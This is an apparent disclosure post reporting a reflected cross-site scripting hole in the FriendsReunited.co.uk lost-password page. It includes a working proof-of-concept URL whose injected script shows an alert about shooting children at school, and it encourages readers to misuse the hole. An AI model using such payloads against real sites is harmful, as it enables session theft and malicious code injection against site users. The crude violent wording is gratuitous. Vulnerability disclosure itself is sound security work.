FriendsReunited.co.uk - XSS hole
--------------------------------
Desc: Theres' a XSS hole in FriendsReunited
Risk: Medium to High (can be used to include malicious code)
Discovered by : dyn0 (codeslag{hat}gmail.com) http://0xdeadface.co.uk

Site blurb : So FriendsReunited is one of those places where people 
	     that you dont really want to talk to can hunt you down and find you.

Hole description : Theres a hole in the Lost Password section

Screenshot : http://0xdeadface.co.uk/fr_xss.JPG

URL : http://www.friendsreunited.co.uk/FriendsReunited.asp
      ?wci=forgotton&member_email=%3Cscript%3Ealert(%22shoot%20the%20kids%20at%20school%22);%3C/script%3E&error=Y

You can use this hole to include code...doesn't that make you hard?

Hugs & Kisses dyn0/codeslag

"Cops say you must refrain from smokin, drinkin' & hoppin trains" - LOC